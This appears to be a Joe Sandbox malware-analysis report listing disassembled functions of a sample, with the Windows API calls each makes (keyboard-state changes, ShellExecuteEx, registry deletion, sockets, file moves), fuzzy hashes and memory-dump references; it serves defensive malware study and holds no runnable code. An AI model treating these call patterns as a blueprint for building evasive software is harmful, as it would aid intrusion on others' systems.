Opcode ID: edf4d0ab91f667a3b2aaf96554a28baeb8c8a68d3b0309533047f4e18815b992
Instruction ID: a566421f3ce1a7e88feae0a5998582c4a99f7ffbb4da0e4d567c2f60e32b0dc3
Opcode Fuzzy Hash: edf4d0ab91f667a3b2aaf96554a28baeb8c8a68d3b0309533047f4e18815b992
Instruction Fuzzy Hash: 550144F2900209BFD7219790DD89EF6777CE708701F4005B5B745E3051EA755E858B75

Function 00B2D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

GetSystemMetrics.USER32(0000000F), ref: 00B2D47C
GetSystemMetrics.USER32(0000000F), ref: 00B2D49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00B2D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B2D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B2D716
ShowWindow.USER32(00000003,00000000), ref: 00B2D735
InvalidateRect.USER32(?,00000000,00000001), ref: 00B2D75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 00B2D77D

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 28a5d376c8fc90da92190002e93c7e0052fa3588fd1c608e22d578aa55ab72b3
Instruction ID: ee80f467fa645f796ebc4e519938096fa4d124ab2d51daf4cbc2aaddad72e498
Opcode Fuzzy Hash: 28a5d376c8fc90da92190002e93c7e0052fa3588fd1c608e22d578aa55ab72b3
Instruction Fuzzy Hash: EEB16971600226ABDF15CF68D9C5BAD7BF1FF08711F0881A9EC489B2A5DB74AD50CB90

Function 00AA2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00ADC1C7,00000004,00000000,00000000,00000000), ref: 00AA2ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00ADC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00AA2B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00ADC1C7,00000004,00000000,00000000,00000000), ref: 00ADC21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00ADC1C7,00000004,00000000,00000000,00000000), ref: 00ADC286

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 1e593b3bd7e7e35bc196d0d1f178b9250fe30e80ae4607923562202cb811a296
Instruction ID: 1cb31be82faf8031d74ca9a237564d943dd7bf74a65c76bc75fddc45221fc6f6
Opcode Fuzzy Hash: 1e593b3bd7e7e35bc196d0d1f178b9250fe30e80ae4607923562202cb811a296
Instruction Fuzzy Hash: 4041DA316087819BD7359B2C9D88B7B7BB2AF87350F54882EF047876E1CB759862D720

Function 00B070C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00B070DD

Part of subcall function 00AC0DB6: std::exception::exception.LIBCMT ref: 00AC0DEC
Part of subcall function 00AC0DB6: __CxxThrowException@8.LIBCMT ref: 00AC0E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00B07114
EnterCriticalSection.KERNEL32(?), ref: 00B07130
_memmove.LIBCMT ref: 00B0717E
_memmove.LIBCMT ref: 00B0719B
LeaveCriticalSection.KERNEL32(?), ref: 00B071AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00B071BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 00B071DE

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 9cf59c7db8a1cb086369305f50126345952668d3a9aae426bf00a31e4962bb4e
Instruction ID: a7e8961794b9a2b32a3e29aba2bfdfd72390e8298e43c66887afdc327b4a6919
Opcode Fuzzy Hash: 9cf59c7db8a1cb086369305f50126345952668d3a9aae426bf00a31e4962bb4e
Instruction Fuzzy Hash: AF315D31900205EBDF10DFA4DD85EAEBBB8EF45710F1541B9F904AB296DB30AE15CBA0

Function 00B261D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00B261EB
GetDC.USER32(00000000), ref: 00B261F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B261FE
ReleaseDC.USER32(00000000,00000000), ref: 00B2620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B26246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B26257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B2902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00B26291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B262B1

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 0224a02826286ac900df93e6c72a18985c3cd243b46fb18d48705d3122210dbf
Instruction ID: 8f7c5793c80e74ee06c1e3715029369a1ee9badb88dad7008e90c65525cebdee
Opcode Fuzzy Hash: 0224a02826286ac900df93e6c72a18985c3cd243b46fb18d48705d3122210dbf
Instruction Fuzzy Hash: F9314F72101214BFEB218F50DC8AFFB3BA9EF49765F044065FE089A191CA759C52CB64

Function 00AFBBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00AFBBC4
_memcmp.LIBCMT ref: 00AFBBE6
_memcmp.LIBCMT ref: 00AFBBFE
_memcmp.LIBCMT ref: 00AFBC11
_memcmp.LIBCMT ref: 00AFBC2B
_memcmp.LIBCMT ref: 00AFBC3E
_memcmp.LIBCMT ref: 00AFBC56
_memcmp.LIBCMT ref: 00AFBC71

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 32f035bc69d1170f2b50949a3064b50622be9df8310d46e457f918371b4e5af0
Instruction ID: f9fec84e9c64bf159c5c4aa820505cb0031ba8b00097318df92aedf081fd70c6
Opcode Fuzzy Hash: 32f035bc69d1170f2b50949a3064b50622be9df8310d46e457f918371b4e5af0
Instruction Fuzzy Hash: CF219FB171120D7BA6086751DE42FBBB7BDDE19388F184024FE049A657EB64DE1282B1

Function 00B0EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00AA9837: __itow.LIBCMT ref: 00AA9862
Part of subcall function 00AA9837: __swprintf.LIBCMT ref: 00AA98AC

Part of subcall function 00ABFC86: _wcscpy.LIBCMT ref: 00ABFCA9

_wcstok.LIBCMT ref: 00B0EC94
_wcscpy.LIBCMT ref: 00B0ED23
_memset.LIBCMT ref: 00B0ED56

Strings

X, xrefs: 00B0ED93

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 3c527e9af899b6574f3772e067d69b63fed3c551b7ad6d9eb476abe97ca4cc7b
Instruction ID: 689f814f0e1933f939db0aabf68a81b84a0a60a1594e71359e7e156ecc3453a8
Opcode Fuzzy Hash: 3c527e9af899b6574f3772e067d69b63fed3c551b7ad6d9eb476abe97ca4cc7b
Instruction Fuzzy Hash: 9FC13C715083019FD764EF24C985A6BBBE4EF86310F04496DF8999B2E2DB30EC45CB92

Function 00B16B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00B16C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00B16C21
WSAGetLastError.WSOCK32(00000000), ref: 00B16C34
htons.WSOCK32(?,?,?,00000000,?), ref: 00B16CEA
inet_ntoa.WSOCK32(?), ref: 00B16CA7

Part of subcall function 00AFA7E9: _strlen.LIBCMT ref: 00AFA7F3
Part of subcall function 00AFA7E9: _memmove.LIBCMT ref: 00AFA815

_strlen.LIBCMT ref: 00B16D44
_memmove.LIBCMT ref: 00B16DAD

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 6dce413dae969bac64467fef829abbbb6c1574bd25225580c5af0755261469f4
Instruction ID: 84029997eb9cd5db1ea1b456e78c36655725eaa0dd2bcdcdf94b373df1317b5e
Opcode Fuzzy Hash: 6dce413dae969bac64467fef829abbbb6c1574bd25225580c5af0755261469f4
Instruction Fuzzy Hash: 6581E171608200ABC710EB24DD82FABB7E8EF85714F50496CF9559B2E2DB70ED41CB52

Function 00AA1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7e5e43ae8129e7b5831e2a7a859cad97ee7ab5c554f49184473776fef54f3af
Instruction ID: 573f68c2c3f76f874a132efbbb028c8a2b050cfa53f962fee7e72cbedb5c3363
Opcode Fuzzy Hash: f7e5e43ae8129e7b5831e2a7a859cad97ee7ab5c554f49184473776fef54f3af
Instruction Fuzzy Hash: 4F714A74904109FFCB148F98CC89ABEBB79FF8A310F148159F915AB291C734AA51CBA4

Function 00B2B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(014B60A0), ref: 00B2B3EB
IsWindowEnabled.USER32(014B60A0), ref: 00B2B3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00B2B4DB
SendMessageW.USER32(014B60A0,000000B0,?,?), ref: 00B2B512
IsDlgButtonChecked.USER32(?,?), ref: 00B2B54F
GetWindowLongW.USER32(014B60A0,000000EC), ref: 00B2B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B2B589

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 037772ab14c59670b2731b9a6d36f48251ad69cf57e0dc006fe592b187850c84
Instruction ID: 294834cd406a2b8c847ed82df04e67d14f5e58120f18d0ba03078a4f3cf4e6b5
Opcode Fuzzy Hash: 037772ab14c59670b2731b9a6d36f48251ad69cf57e0dc006fe592b187850c84
Instruction Fuzzy Hash: A271AE34600225AFDB35AF54E8D0FBA7BF5EF09300F1444A9EA59973A2CB31A951DB50

Function 00B1F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B1F448
_memset.LIBCMT ref: 00B1F511
ShellExecuteExW.SHELL32(?), ref: 00B1F556

Part of subcall function 00AA9837: __itow.LIBCMT ref: 00AA9862
Part of subcall function 00AA9837: __swprintf.LIBCMT ref: 00AA98AC

Part of subcall function 00ABFC86: _wcscpy.LIBCMT ref: 00ABFCA9

GetProcessId.KERNEL32(00000000), ref: 00B1F5CD
CloseHandle.KERNEL32(00000000), ref: 00B1F5FC

Strings

@, xrefs: 00B1F525

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 41a85fbed45519b497c1a564365d87b73865639e6ab004151fa5802bcef20334
Instruction ID: e64092058c7e3c780794d42120156718edfbfddfbdba91169d2cc1f0f399b069
Opcode Fuzzy Hash: 41a85fbed45519b497c1a564365d87b73865639e6ab004151fa5802bcef20334
Instruction Fuzzy Hash: 6D619175A00619DFCF14DFA4C9819AEBBF5FF49310F5480A9E856AB391CB34AD41CB90

Function 00B00F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00B00F8C
GetKeyboardState.USER32(?), ref: 00B00FA1
SetKeyboardState.USER32(?), ref: 00B01002
PostMessageW.USER32(?,00000101,00000010,?), ref: 00B01030
PostMessageW.USER32(?,00000101,00000011,?), ref: 00B0104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00B01095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B010B8

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 9dd33d80b35e5a3b98dcd152736e496a58a23dc1c0d38f5400a473ae048f4293
Instruction ID: 036da37dc320323e592a723b7dac0c840f1fa2adbc9a223882e9802bc4df41a7
Opcode Fuzzy Hash: 9dd33d80b35e5a3b98dcd152736e496a58a23dc1c0d38f5400a473ae048f4293
Instruction Fuzzy Hash: 045115606147D63DFB3A52388C45BBABEE9EB06304F0889C9E1D4968D3D2E8DCC8D751

Function 00B00D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00B00DA5
GetKeyboardState.USER32(?), ref: 00B00DBA
SetKeyboardState.USER32(?), ref: 00B00E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B00E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B00E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B00EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B00EC9

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: b4decc76eb9d5aa9803d1f99c31d0a2ecc9e57ccaff3f7d017e60c2a3fb5e39b
Instruction ID: 9ed882a1c9bc499eb7d25f7d815e647ebe4e15f18b41f8173dfebbf99ad2cd06
Opcode Fuzzy Hash: b4decc76eb9d5aa9803d1f99c31d0a2ecc9e57ccaff3f7d017e60c2a3fb5e39b
Instruction Fuzzy Hash: 5C5107A09287D63DFB366774CC45BBA7EE9EB06300F0889D9E1D4564C2C795AC88E760

Function 00B055FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00B0560A
_wcsncpy.LIBCMT ref: 00B0563F
_wcsncpy.LIBCMT ref: 00B05671
_wcsncpy.LIBCMT ref: 00B056A4
_wcsncpy.LIBCMT ref: 00B056E6
_wcsncpy.LIBCMT ref: 00B05720
_wcsncpy.LIBCMT ref: 00B0574F

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: dfe7dde4c3befd724e74415e2c990be8abd1ef986320a00170fe8f68e299661d
Instruction ID: 9bf32385618dd3575f28fce23e312efc5d14a7a79e4b3bc8ca83a52ce624379f
Opcode Fuzzy Hash: dfe7dde4c3befd724e74415e2c990be8abd1ef986320a00170fe8f68e299661d
Instruction Fuzzy Hash: 0841B866C5061876CB11EBB48C46FCFB7FC9F04310F51855AE504E3161FB34A645C7AA

Function 00B03671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B03697,?), ref: 00B0468B

Part of subcall function 00B0466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B03697,?), ref: 00B046A4

lstrcmpiW.KERNEL32(?,?), ref: 00B036B7
_wcscmp.LIBCMT ref: 00B036D3
MoveFileW.KERNEL32(?,?), ref: 00B036EB
_wcscat.LIBCMT ref: 00B03733
SHFileOperationW.SHELL32(?), ref: 00B0379F

Strings

\*.*, xrefs: 00B0372D

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: cffbed4a1fdf348c5791b73f5750009c934903965b0f37ec66c8a6c9a176883d
Instruction ID: 25004652ad8a49fa08d760267bd6ca7069fa6e8f6cf1152b9a98a7951a9a81ee
Opcode Fuzzy Hash: cffbed4a1fdf348c5791b73f5750009c934903965b0f37ec66c8a6c9a176883d
Instruction Fuzzy Hash: 674181B1508344AEC751EF64C445ADF7BECEF89780F4008AEB49AC3291EB35D689C756

Function 00B27291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B272AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B27351
IsMenu.USER32(?), ref: 00B27369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B273B1
DrawMenuBar.USER32 ref: 00B273C4

Strings

0, xrefs: 00B2729E

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 78aae74fb15e720c2003e1a25729bc8733b236f74ad8765a6c3a4a6b978b12eb
Instruction ID: 41b0ce8ebca2cbc75d30acb128975d97f9e1c82b11015d1e9ac9ab99dd26d5d1
Opcode Fuzzy Hash: 78aae74fb15e720c2003e1a25729bc8733b236f74ad8765a6c3a4a6b978b12eb
Instruction Fuzzy Hash: 96415871A44209EFDB20CF50E884EAABBF8FB08310F1485A9FD4997250CB30AD11DF58

Function 00B20FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00B20FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B20FFE
FreeLibrary.KERNEL32(00000000), ref: 00B210B5

Part of subcall function 00B20FA5: RegCloseKey.ADVAPI32(?), ref: 00B2101B
Part of subcall function 00B20FA5: FreeLibrary.KERNEL32(?), ref: 00B2106D
Part of subcall function 00B20FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00B21090

RegDeleteKeyW.ADVAPI32(?,?), ref: 00B21058

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
